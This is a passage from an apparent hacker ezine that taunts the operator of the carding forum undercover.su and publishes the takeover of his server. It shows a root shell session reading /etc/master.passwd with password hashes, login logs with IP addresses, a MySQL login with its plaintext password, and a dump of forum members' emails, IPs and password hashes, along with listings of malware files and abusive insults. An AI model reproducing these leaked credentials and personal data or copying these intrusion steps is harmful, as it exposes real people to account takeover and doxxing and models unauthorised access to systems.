"HMAC firewall" +# to help block DoS attacks and UDP port flooding. +# +# Generate with: +# openvpn --genkey --secret ta.key +# +# The server and each client must have +# a copy of this key. +# The second parameter should be '0' +# on the server and '1' on the clients. +;tls-auth ta.key 0 # This file is secret + +# Select a cryptographic cipher. +# This config item must be copied to +# the client config file as well. +;cipher BF-CBC # Blowfish (default) +;cipher AES-128-CBC # AES +;cipher DES-EDE3-CBC # Triple-DES + +# Enable compression on the VPN link. +# If you enable it here, you must also +# enable it in the client config file. +comp-lzo + +# The maximum number of concurrently connected +# clients we want to allow. +;max-clients 100 + +# It's a good idea to reduce the OpenVPN +# daemon's privileges after initialization. +# +# You can uncomment this out on +# non-Windows systems. +;user nobody +;group nogroup + +# The persist options will try to avoid +# accessing certain resources on restart +# that may no longer be accessible because +# of the privilege downgrade. +persist-key +persist-tun + +# Output a short status file showing +# current connections, truncated +# and rewritten every minute. +status /dev/null +#status.log + +# By default, log messages will go to the syslog (or +# on Windows, if running as a service, they will go to +# the "\Program Files\OpenVPN\log" directory). +# Use log or log-append to override this default. +# "log" will truncate the log file on OpenVPN startup, +# while "log-append" will append to it. Use one +# or the other (but not both). +log /dev/null +;log-append openvpn.log + +# Set the appropriate level of log +# file verbosity. +# +# 0 is silent, except for fatal errors +# 4 is reasonable for general usage +# 5 and 6 can help to debug connection problems +# 9 is extremely verbose +verb 0 + +# Silence repeating messages. At most 20 +# sequential messages of the same message +# category will be output to the log. +;mute 20 + +crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem + +$ cat /etc/sockd.conf +# $Id: sockd.conf,v 1.49 2009/10/27 11:56:55 karls Exp $ +# +# A sample sockd.conf +# +# +# The configfile is divided into three parts; +# 1) serversettings +# 2) rules +# 3) routes +# +# The recommended order is: +# Serversettings: +# logoutput +# internal +# external +# method +# clientmethod +# users +# compatibility +# extension +# timeout +# srchost +# +# Rules: +# client block/pass +# from to +# libwrap +# log +# +# block/pass +# from to +# method +# command +# libwrap +# log +# protocol +# proxyprotocol +# +# Routes: + +# the server will log both via syslog, to stdout and to /var/log/lotsoflogs +#logoutput: syslog stdout /var/log/lotsoflogs +logoutput: /dev/null + +# The server will bind to the address 10.1.1.1, port 1080 and will only +# accept connections going to that address. +internal: 92.241.190.253 port = 14421 +# Alternatively, the interface name can be used instead of the address. +#internal: eth0 port = 1080 + +# all outgoing connections from the server will use the IP address +# 195.168.1.1 +external: 92.241.190.253 + +# list over acceptable methods, order of preference. +# A method not set here will never be selected. +# +# If the method field is not set in a rule, the global +# method is filled in for that rule. +# + +# methods for socks-rules. +method: username +#none #rfc931 + +# methods for client-rules. +#clientmethod: none + +#or if you want to allow rfc931 (ident) too +#method: username rfc931 none + +#or for PAM authentification +#method: pam + +# +# User identities, an important section. +# + +# when doing something that can require privilege, it will use the +# userid "sockd". +#user.privileged: sockd + +# when running as usual, it will use the unprivileged userid of "sockd". +#user.unprivileged: sockd + +# If you compiled with libwrap support, what userid should it use +# when executing your libwrap commands? "libwrap". +#user.libwrap: libwrap + + +# +# Some options to help clients with compatibility: +# + +# when a client connection comes in the socksserver will try to use +# the same port as the client is using, when the socksserver +# goes out on the clients behalf (external: IP address). +# If this option is set, Dante will try to do it for reserved ports aswell. +# This will usually require user.privileged to be set to "root". +#compatibility: sameport + +# If you are using the bind extension and have trouble running servers +# via the server, you might try setting this. The consequences of it +# are unknown. +#compatibility: reuseaddr + +# +# The Dante server supports some extensions to the socks protocol. +# These require that the socks client implements the same extension and +# can be enabled using the "extension" keyword. +# +# enable the bind extension. +#extension: bind + + +# +# Misc options. +# + +# how many seconds can pass from when a client connects til it has +# sent us it's request? Adjust according to your network performance +# and methods supported. +#timeout.negotiate: 30 # on a lan, this should be enough. + +# how many seconds can the client and it's peer idle without sending +# any data before we dump it? Unless you disable tcp keep-alive for +# some reason, it's probably best to set this to 0, which is +# "forever". +timeout.io: 0 # or perhaps 86400, for a day. + +# do you want to accept connections from addresses without +# dns info? what about addresses having a mismatch in dnsinfo? +#srchost: nounknown nomismatch + +# +# The actual rules. There are two kinds and they work at different levels. +# +# The rules prefixed with "client" are checked first and say who is allowed +# and who is not allowed to speak/connect to the server. I.e the +# ip range containing possibly valid clients. +# It is especially important that these only use IP addresses, not hostnames, +# for security reasons. +# +# The rules that do not have a "client" prefix are checked later, when the +# client has sent its request and are used to evaluate the actual +# request. +# +# The "to:" in the "client" context gives the address the connection +# is accepted on, i.e the address the socksserver is listening on, or +# just "0.0.0.0/0" for any address the server is listening on. +# +# The "to:" in the non-"client" context gives the destination of the clients +# socksrequest. +# +# "from:" is the source address in both contexts. +# + + +# +# The "client" rules. All our clients come from the net 10.0.0.0/8. +# + +# Allow our clients, also provides an example of the port range command. +client pass { + from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0 + #method: rfc931 # match all idented users that also are in passwordfile +} + +# This is identical to above, but allows clients without a rfc931 (ident) +# too. In practise this means the socksserver will try to get a rfc931 +# reply first (the above rule), if that fails, it tries this rule. +#client pass { +# from: 10.0.0.0/8 port 1-65535 to: 0.0.0.0/0 +#} + + +# drop everyone else as soon as we can and log the connect, they are not +# on our net and have no business connecting to us. This is the default +# but if you give the rule yourself, you can specify details. +#client block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# log: connect error +#} + + +# the rules controlling what clients are allowed what requests +# + +# you probably don't want people connecting to loopback addresses, +# who knows what could happen then. +#block { +# from: 0.0.0.0/0 to: lo0 +# log: connect error +#} + +# the people at the 172.16.0.0/12 are bad, no one should talk to them. +# log the connect request and also provide an example on how to +# interact with libwrap. +#block { +# from: 0.0.0.0/0 to: 172.16.0.0/12 +# libwrap: spawn finger @%a +# log: connect error +#} + +# unless you need it, you could block any bind requests. +#block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# command: bind +# log: connect error +#} + +# or you might want to allow it, for instance "active" ftp uses it. +# Note that a "bindreply" command must also be allowed, it +# should usually by from "0.0.0.0/0", i.e if a client of yours +# has permission to bind, it will also have permission to accept +# the reply from anywhere. +pass { + from: 0.0.0.0/0 to: 0.0.0.0/0 +# command: bind +# log: connect error +} + +# some connections expect some sort of "reply", this might be +# the reply to a bind request or it may be the reply to a +# udppacket, since udp is packetbased. +# Note that nothing is done to verify that it's a "genuine" reply, +# that is in general not possible anyway. The below will allow +# all "replies" in to your clients at the 10.0.0.0/8 net. +#pass { +# from: 0.0.0.0/0 to: 10.0.0.0/8 +# command: bindreply udpreply +# log: connect error +#} + + +# pass any http connects to the example.com domain if they +# authenticate with username. +# This matches "example.com" itself and everything ending in ".example.com". +#pass { +# from: 10.0.0.0/8 to: .example.com port = http +# log: connect error +# method: username +#} + + +# block any other http connects to the example.com domain. +#block { +# from: 0.0.0.0/0 to: .example.com port = http +# log: connect error +#} + +# everyone from our internal network, 10.0.0.0/8 is allowed to use +# tcp and udp for everything else. +#pass { +# from: 10.0.0.0/8 to: 0.0.0.0/0 +# protocol: tcp udp +#} + +# last line, block everyone else. This is the default but if you provide +# one yourself you can specify your own logging/actions +#block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# log: connect error +#} + +# route all http connects via an upstream socks server, aka "server-chaining". +#route { +# from: 10.0.0.0/8 to: 0.0.0.0/0 port = http via: socks.example.net port = socks +#} + + +All in all this really shouldn't surprise anyone. Carders.cc was told +to fuck off twice now and we're tired of cleaning their shit up. +Seriously, it's not a secret that carders.cc's team members are a bit +dim, though even they should have got the hint by now. Why don't you +go out, steal some handbags or whatever scum does at your age? This is +not only a warning to you but also to your users; don't put your trust +in admins that are that fucking incapable, because if you do, you will +be owned and your data will be exp0sed. - AGAIN - + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========{ Undercover.su }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ k!LLu, well, what can be said about him? He's +,;' \ /-(.;, ) probably the most attention-whoring and at the + ) / ) / same time the most hated kid around. He spends + // || his time lurking around on kiddyboards, bragging + )_\ )_\ about his imaginary achievements and skills. He +changes his nickname more frequently than his underwear but usually +gets uncovered instantly due to his obtrusive arrogance and stupidity. +All in all he is hands-down the most annoying little brat around. +Clearly, this self-proclaimed hosting-pro and his most recent strokes +of genius "Secure-Host", "Undercover.su" and "Snap Reloaded" have to +be dealt with. k!LLu aka s1mpl3x aka purplera1n gave his best to make +his board ("application only") look more private and exclusive than a +dinner with the president. Probably this is why even Fukushima looks +crowded compared to undercover.su. But what can we say? He begged for +it so we owned him anyway; in fact we're presenting you all of his +"projects" torn to pieces. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: erstens | +| k!LLu: entscheide ich ob es ein board gibt oder nich | +|____________________________________________________________________| + +k!LLu decides if a messageboard exists or not! It's no secret that +he is a bit delusional and tends to get stuff mixed up. But, admit +it, his ramblings are kind of fun to read and we look forward to +seeing what he comes up with to explain him being owned and exposed. + ___________________________________________________________________ _ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: profis ???? | +| LOOOOOOOOOL | +| | +| 1337Crew, Public lücke in der SB | +| Carders, Public lücke im SMF | +| Carders #2 , [0-day]24.12.2010 vbulletin 4.0p1Exploit | +| | +| scriptkiddys.... nothing serverside... | +| | +| wäre ich früher aufgestanden hätte dort undercover | +| gestanden :/ | +| | +| Die Admins sind einfach zu daemlich.... | +| Crimenetwork -- MostHated&Unhacked | +|____________________________________________________________________| + +k!LLu basically says that 1337crew and carders.cc were hacked with +public exploits by amateurs. He would have done it himself if he +hadn't slept so long. + +The main question here is whether he himself believes this bullshit. +But seriously, he can't be that dumb. Crimenetwork, the predecessor of +undercover.su, was destined to fail from the beginning since k!LLu has +always been trying to create the image of the knowledgeable hacker and +admin he clearly is not. To promote his projects he apparently doesn't +back off from talking about public vulnerabilities that never existed +or exploits he'd never get his hands on. It must be really depressing +to have never even seen or possesed a 0day when one is immensely +desperate to make others believe so. The sad thing actually is that +his constant lying is believed by people incapable of checking simple +facts. But just imagine this poor little guy trying to insult the +hackers who are just watching him typing it, failing to understand +that he is just one of many Trumans in our show. We hope that this +ezine can once and for all depict k!LLu as the cocky kid he is. + +When trying not to puke while surfing Undercover.su we stumbled upon +some rumors. One of which stated that we are Global Evolution - a +private little German fag community that tries to explain security +vulnerabilities by blogging videos about XSS. No we're not Global +Evolution. If anything, we are evolution. We lend a hand to natural +selection, by helping to wipe out the weak ones. And, believe us or +not, k!LLu and his projects deserve to be wiped out more than anybody +or anything else. We keep the show going ... + +# uname -a +FreeBSD 8.2-RELEASE-p3 #4: Thu Sep 29 14:54:55 MSD 2011 + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +ucsu:*:1002:1002:User &:/home/ucsu:/usr/local/bin/bash +true:*:1003:1003:User &:/home/true:/sbin/nologin +symb:*:1006:1006:User &:/home/symb:/bin/sh +hosting:*:1008:1008:User &:/home/hosting:/sbin/nologin +gtbros:*:1001:1001:User &:/home/gtbros:/sbin/nologin +relite:*:1007:1007:User &:/home/relite:/bin/sh +wayne:*:1004:1004:User &:/home/wayne:/sbin/nologin +ixde:*:1009:1009:User &:/home/ixde:/sbin/nologin +backspace:*:1005:1005:User &:/home/backspace:/bin/sh +lcf:*:1000:1000:User &:/home/lcf:/bin/sh + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ +# +root:$1$bqzBFX0T$LkqVd6ktOTUX0qtY3W8fA1:0:0::0:0:Charlie &:/root:/bin/csh +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +ucsu:$1$rkQkyHD4$SPar9t/apgqXI9iBUBSh/0:1002:1002::0:0:User &:/home/ucsu:/usr/local/bin/bash +true:$1$bWcK0H74$NTULoy82dfWaevrF2Hf.T/:1003:1003::0:0:User &:/home/true:/sbin/nologin +symb:$1$Lx5.ll9w$uMdF6FKqh4TuC5QuazVQ31:1006:1006::0:0:User &:/home/symb:/bin/sh +hosting:$1$ptOUAPmM$7N/IB1xCXt9x.ft34Dlk/.:1008:1008::0:0:User &:/home/hosting:/sbin/nologin +gtbros:$1$atXPT9B1$qNpYOTWDHlcis3ldbFSjg/:1001:1001::0:0:User &:/home/gtbros:/sbin/nologin +relite:$1$c7m4u7CP$P6QVZVnvxhIqvJRAoZ87j0:1007:1007::0:0:User &:/home/relite:/bin/sh +wayne:$1$SCxNrKiE$iA2K05rvKgbGW/yrdqlVn1:1004:1004::0:0:User &:/home/wayne:/sbin/nologin +ixde:$1$te1KzFVe$gRVE863DVX8QmLT.Tpsvp0:1009:1009::0:0:User &:/home/ixde:/sbin/nologin +backspace:$1$ZPiFb/ga$z0cTF3T8CV7m0guoYVsJJ/:1005:1005::0:0:User &:/home/backspace:/bin/sh +lcf:$1$85k5c7VQ$5nqIFiZbOBFD5Z9LTxmd1.:1000:1000::0:0:User &:/home/lcf:/bin/sh + +# last +ixde ftp 94.220.134.71 Tue Oct 11 17:33 - 17:44 (00:10) +ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:27 (00:01) +ixde ftp 85.17.97.27 Tue Oct 11 17:25 - 17:31 (00:06) +ixde ftp 94.220.134.71 Tue Oct 11 16:37 - 16:41 (00:04) +ixde ftp 94.220.134.71 Tue Oct 11 16:19 - 16:27 (00:07) +ucsu ftp 193.107.17.239 Tue Oct 11 11:31 - 11:32 (00:00) +ixde ftp 94.220.134.71 Mon Oct 10 15:44 - 15:48 (00:03) +ixde ftp 94.220.134.71 Sun Oct 9 20:42 - 20:47 (00:04) +ucsu ftp 77.20.18.64 Sat Oct 8 17:04 - 17:07 (00:03) +ucsu ftp 77.20.18.64 Sat Oct 8 12:57 - 13:00 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 14:18 - 14:21 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 14:01 - 14:06 (00:04) +ixde ftp 217.255.238.21 Fri Oct 7 13:56 - 13:58 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:55 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:54 - 13:57 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:51 - 13:52 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:49 - 13:52 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:47 - 13:48 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:45 - 13:48 (00:03) +ixde ftp 217.255.238.21 Fri Oct 7 13:44 - 13:45 (00:01) +ixde ftp 217.255.238.21 Fri Oct 7 13:42 - 13:44 (00:01) +ixde ftp 94.220.134.71 Fri Oct 7 13:40 - 13:46 (00:05) +ixde ftp 217.255.238.21 Fri Oct 7 13:39 - 13:45 (00:05) +backspace ftp 217.23.8.127 Wed Oct 5 11:34 - 11:59 (00:24) +ucsu ftp 77.20.18.64 Tue Oct 4 17:10 - 17:13 (00:03) +backspace ftp 95.128.242.224 Mon Oct 3 22:29 - 22:39 (00:10) +true ftp 77.20.18.64 Mon Oct 3 16:59 - 17:00 (00:01) +true ftp 77.20.18.64 Mon Oct 3 16:58 - 16:59 (00:01) +true ftp 77.20.18.64 Mon Oct 3 16:58 - 17:01 (00:03) +true ftp 77.20.18.64 Mon Oct 3 16:54 - 16:57 (00:03) +ixde ftp 94.220.134.71 Mon Oct 3 09:38 - 10:07 (00:29) +ixde ftp 94.220.134.71 Mon Oct 3 09:11 - 09:17 (00:05) +ixde ftp 94.220.134.71 Sun Oct 2 23:04 - 23:04 (00:00) +ixde ftp 94.220.134.71 Sun Oct 2 23:01 - 23:04 (00:03) +ixde ftp 94.220.134.71 Sun Oct 2 22:31 - 22:45 (00:13) +ixde ftp 94.220.134.71 Sun Oct 2 22:29 - 22:45 (00:15) + +# host 77.20.18.64 +64.18.20.77.in-addr.arpa domain name pointer 77-20-18-64-dynip.superkabel.de. + +# there we go^C + +# cd /home/ucsu + +# ls -la + +total 32 +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 2 ucsu www 512 May 6 13:08 abuse.undercover.su +drwxrwx--- 2 ucsu www 512 Aug 16 00:12 delict.cc +drwxrwx--- 2 ucsu www 512 Apr 13 13:04 moneymake.us +drwxrwx--- 3 ucsu www 512 Apr 7 2011 scene-sector.to +drwxrwx--- 2 ucsu www 2048 Oct 11 19:57 temp +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 undercover.su + +# cd abuse.undercover.su + +# ls -la + +total 12 +drwxrwx--- 2 ucsu www 512 May 6 13:08 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 ucsu www 1034 May 6 13:08 index.html + +# cd .. +# cd delict.cc + +# ls -la + +total 100 +drwxrwx--- 2 ucsu www 512 Aug 16 00:12 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 ucsu www 423 Aug 15 23:46 index.php +-rw-r--r-- 1 ucsu www 44909 Aug 16 00:12 mainlogo.png + +# cd .. + +# cd moneymake.us + +# ls -la +total 12 +drwxrwx--- 2 ucsu www 512 Apr 13 13:04 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 root www 261 Apr 13 13:04 index.php + +# cat index.php +<html> +<head> + +<title>Undercover.SU + + + + + + + +Sie werden weitergeleitet... + +# cd .. + +# cd scene-sector.to + +# ls -la +total 16 +drwxrwx--- 3 ucsu www 512 Apr 7 2011 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +-rw-r--r-- 1 root www 261 Apr 5 2011 index.php +drwxr-xr-x 6 root www 512 Apr 9 2011 test +# cd test + +# ls -la + +total 24 +drwxr-xr-x 6 root www 512 Apr 9 2011 . +drwxrwx--- 3 ucsu www 512 Apr 7 2011 .. +drwxrwxrwx 3 root www 512 Apr 7 2011 4234047??hscjfsjdf89ds89898j34jjfdhhs9322jss +drwxr-xr-x 5 root www 512 Apr 7 2011 admin +drwxr-xr-x 3 root www 512 Apr 7 2011 designe +drwxr-xr-x 3 root www 512 Apr 9 2011 img + +# ls -la +total 15032 +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 . +drwxr-x--- 8 ucsu www 512 Aug 16 17:06 .. +drwxr-xr-x 8 root www 512 Apr 30 00:07 .trash +-rw-r--r-- 1 root www 1799843 May 5 18:04 SpyEye.Builder.v1.2.99.zip +-rw-r--r-- 1 root www 320512 Jun 6 20:45 back.exe +-rw-r--r-- 1 root www 118784 Jun 6 14:22 backs.exe +-rw-r--r-- 1 root www 4538223 Jun 6 14:45 backspace.rar +-rw-r--r-- 1 root www 7168 May 11 13:26 elite_4.2.exe +drwxr-xr-x 3 ucsu www 512 Sep 29 18:50 files +-rw-r--r-- 1 ucsu www 408 Feb 6 2011 ico.png +-rw-r--r-- 1 ucsu www 1053 Feb 6 2011 icon_icq.png +-rw-r--r-- 1 ucsu www 536 Aug 21 15:59 index.php +-rw-r--r-- 1 root www 515 May 4 10:00 index.php_ +-rw-r--r-- 1 ucsu www 162 Feb 6 2011 index_.html +drwxr-xr-x 12 ucsu www 512 Sep 27 12:59 ipb3 +drwxr-xr-x 2 root www 512 May 4 09:58 ipboard +drwxr-xr-x 21 root www 1024 Apr 16 16:07 ipboard___beta +-rw-r--r-- 1 ucsu www 25474 Feb 6 2011 logo.jpg +-rw-r--r-- 1 ucsu www 4657 Feb 6 2011 logo.png +-rw-r--r-- 1 root www 44909 May 4 09:53 mainlogo.png +drwxr-xr-x 2 root www 512 Jun 6 14:31 private +-rw-r--r-- 1 root www 253952 May 5 16:32 snap.exe +drwxr-xr-x 3 root www 512 Aug 14 22:01 snapshot +-rw-r--r-- 1 root www 118784 Jun 6 14:39 stansecu.exe +drwxr-xr-x 3 root www 512 May 4 11:15 static +-rw-r--r-- 1 ucsu www 107003 Sep 16 16:20 test.rar +-rw-r--r-- 1 root www 118784 May 18 19:35 v2.exe +-rw-r--r-- 1 root www 118784 May 18 19:35 v3.exe + +# cd private +# ls -la +total 8908 +drwxr-xr-x 2 root www 512 Jun 6 14:31 . +drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 .. +-rw-r--r-- 1 root www 4538210 Jun 6 14:32 backspace.rar +-rw-r--r-- 1 root www 44 Jun 6 13:23 index.php + +# cat index.php +Certificate not found. +-- Access prohibited + +Alright, before we continue, lets have a look at some of k!LLu's +enhancements he stated after Undercover.su left its beta status: + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| k!LLu: Fassen wir kurz zusammen, unsere Datenbank enthält nun | +| keine IP Adressen mehr, es ist nahezu unmöglich | +| IP-Adressen mitzuloggen, die Passwörter sind "uncrackbar" | +| gespeichert. Alle Beiträge, E-Mail's, Themen und PM's | +| sind unlesbar verschluesselt. Selbst ein Hack wäre nun | +| völlig egal und sinnfrei! | +|____________________________________________________________________| + +As we can see, it clearly should not be possible to take any advantage +of hacking undercover.su because of its highly encrypted database. + +# grep ucsu /var/log/proftpd-transfer.log | tail +Thu Sep 29 16:57:38 2011 0 77.20.18.64 1994 /home/ucsu/undercover.su/ipb3/public/style_css/css_8/calendar_select.css a _ o r ucsu ftp 0 * c +Thu Sep 29 16:59:00 2011 0 77.20.18.64 79303 /home/ucsu/undercover.su/ipb3/public/style_css/ipb_styles.css a _ i r ucsu ftp 0 * c +Thu Sep 29 17:03:42 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:07:28 2011 0 77.20.18.64 34809 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:08:43 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:08:59 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg a _ d r ucsu ftp 0 * c +Thu Sep 29 17:13:31 2011 0 77.20.18.64 41797 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:17:35 2011 0 77.20.18.64 59481 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 17:19:14 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c +Thu Sep 29 18:49:59 2011 1 77.20.18.64 160997 /home/ucsu/undercover.su/files/design.PNG b _ i r ucsu ftp 0 * c + +Seems like undercover.su/ipb3 is the latest version of k!LLu's project + +# cd ipb3 + +# cat conf_global.php + + +# mysql -u ucsu_ipb ucsu_ipb -p712987asdxyas +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 465217 +Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT member_id, name, email, ip_address, members_pass_hash, members_pass_salt FROM ucsec_members LIMIT 10; ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +| member_id | name | email | ip_address | members_pass_hash | members_pass_salt | ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +| 1 | s1mpl3x | purplera1n@safe-mail.net | 77.20.18.64 | 517cc224929adfa4906328f1ae42bf22 | !4w3= | +| 2 | medi8tor | ace1992@gmx.net | | 4f6f0b6261c8363a71b6fdfdc037610d | J-|`H | +| 3 | usrid3 | usrid3@undercover.su | | 058089135cfab52cc9d1ba6ef32ea202 | 0]qxI | +| 4 | usrid4 | usrid4@undercover.su | | f29637821bb0e05a55dc8ebf9e24e06f | #}(TJ | +| 5 | test | test@mail.de | | 0bb5a87636ebda286ceea9494d48dc12 | 9N2t, | +| 6 | Man4ic | mrajabi@hotmail.de | | f0a77e175ea95c9b24e2e24eba27c51b | Q}lRm | +| 7 | bin | binary@secure-mail.biz | | 8ae8499691d35b04442a6ba87a92a9fa | JM;3! | +| 8 | Ixde | angela.krueger@hotmail.de | | 5b7eee531e99f89be45ff928d7e045ab | qfi7X | +| 9 | casy | 76671253@trash-mail.com | | abddc59b20ad591d10b47b02bd70d426 | 4G:(s | +| 10 | soldier16 | musekeule@yahoo.de | | 1079fe12b4d9e3429c8975920c79a161 | *Y$cj | ++-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ +10 rows in set (0.00 sec) + +mysql> SELECT msg_post, msg_ip_address FROM ucsec_message_posts WHERE msg_author_id = 1 LIMIT 1; ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +| msg_post | msg_ip_address | ++---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ +| Meld dich ICQ 83885,
wenn dein Tut haelt was es verspricht kann ich dir auch gerne ne Menge in Bar zukommen lassen -- je nachdem wieviel im Shop ist,
